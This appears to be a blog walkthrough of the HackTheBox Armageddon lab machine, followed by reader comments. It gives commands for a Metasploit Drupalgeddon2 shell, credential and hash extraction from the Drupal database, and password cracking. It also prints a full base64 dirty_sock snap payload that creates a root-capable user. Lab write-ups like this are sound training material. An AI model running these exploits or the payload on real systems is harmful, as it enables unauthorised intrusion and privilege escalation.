HackTheBox : Armageddon Walkthrough

 

Concepts Learnt :

1. Enumeration

2. Snap privilege escalation

3. Drupal exploit (metasploit)

4. python2

Steps to Enumerate :

Run an Nmap Scan to find all the open ports!

Command : nmap 10.10.10.233 -A

10.10.10.233 IP of the Server

-A This options makes Nmap make an effort in identifying the target OS,services and the versions. It also does traceroute and applies NSE scripts to detect additional information.

-vv Defines level 2 verbosity for the scan

We see that there are 4 ports open :

22/tcp- SSH port

80/tcp- HTTP port

2021/tcp — Servexec(filtered)

7435/tcp — unknown(filtered)

Lets check the http site on port 80:

A simple website with User Login!

Lets try the simple admin:password combination to check! Doesn’t work!

Checking the page source, we can see that is Drupal version 7

Let’s check if we can work a way around the login page!

Exploring, I found that Drupal 7 can be exploited using Metasploit!

Command : msfconsole

Command : search drupal

We will use the drupalgeddon2

Command : use 4

Let’s see all the options

Command : show options

We need to specify RHOSTS, TARGETURI, LHOST and LPORT!

Let do that by using the set command

Command : set (RHOSTS/TARGETURI/LHOST/LPORT)

You will also need to set the LHOSTS to your tun0 ip address

To check your tun0 ip

Command : ifconfig

Now we will exploit!

Command : exploit

And we get a meterpreter session!

Lets remove meterpreter and get the shell!

Command : shell

Lets look around!

We have multiple folders available, Let’s check them!

Checking the sites folder we have a default folder!

Checking that out we have settings.php file!

Command : cat settings.php

Checking this file out, we possibly get credentials for mysql and the database name!

Let’s explore the tables in the database!

Command : mysql -u ****** -p************** -D drupal -e ‘show tables;’

We get a list of tables in the drupal database.

Lets check the users list!

Command : mysql -u ********* -p****************** -D drupal -e ‘select name,pass from users;’

We get 2 users and password hashes one of which is an admin!

Let’s run these passwords through john the ripper!

Save the admin hash in a file, I named it hash and saved it on desktop

We will run it through the rockyou.txt wordlist

Command : john ~/Desktop/hash -w /usr/share/wordlists/rockyou.txt

You will get the cracked password below!

Let’s use the credentials we have to ssh into the box!

Command : ssh username@10.10.10.233

And we are in!

Checking the file system we have user.txt our first flag!

Checking root privileges :

Command : sudo -l

The user can run snap install without password!

Checking for possible privilege escalation using snap we find a github repository for dirty_sock

Link to same here

Lets use this!

However the dirty sock requires python 3 and while checking for the python version on the box we get the python version as 2.7.5

Command : python — version

We will have to manually add in the dirty_sock code.

Checking the raw dirty_sock code for version 2, we find a code in the first half which looks like this!

Lets copy and print this in a .snap file using python 2 and try installing it!

— code —

python2 -c ‘print “aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw” + “A”*4256 + “==”’ | base64 -d > leet.snap

— code —

Copy the code above and run it as it is!

Lets install dirty sock now!

Command : sudo /usr/bin/snap install — devmode leet.snap

This will install dirty sock on the system!

Now check the home directory, there will be an additional user dirty_sock

Let change user to dirty_sock

Command : su dirty_sock

The default username and password for dirty_sock is dirty_sock

NOTE : If an error pops up saying ‘user dirty_sock does not exist’ reset the machine and redo the steps mentioned above!

We are in!

Now we need to run as root!

Command : sudo -i

Again enter the password : dirty_sock

Now move into root directory and we have our second flag in root.txt!

This was a fun room to work on. Hope you enjoyed!

Comments

  1. When i execute mysql -u ****** -p************** -D drupal -e ‘show tables;’ it asks me to enter a password, which password should i use ?

    ReplyDelete
    Replies
    1. mysql -u drupaluser -p -D drupal -e 'show tables;'
      password -> C*************Vj

      Delete
    2. You probably had a space after the -p
      you have to put -pPASSWORD not -p PASSWORD otherwise it will not recognize it

      Delete
  2. ERROR 1698 (28000): Access denied for user 'drupaluser'@'localhost' help

    ReplyDelete
    Replies
    1. can u solve it? i cant get access, i have the same error all the time "ERROR 1698 (28000): Access denied for user 'drupaluser'@'localhost' "

      Delete
  3. Hey man just for the record, a lot of systems have both versions of python installed (including this one) so you could have just ran python3

    Just wanted to toss that out there for anyone that wasn't aware

    ReplyDelete
  4. Error: UTF-16 BOM seen in input file.

    ReplyDelete
  5. Hello! When I run the python code it shows error message of invalid syntax.
    File "", line 1
    ‘print
    ^
    SyntaxError: invalid syntax

    Is there anyone that can advice? thanks in advance!

    ReplyDelete

Post a Comment

Popular posts from this blog

HackTheBox : Knife Walkthrough

HackTheBox : Delivery Walkthrough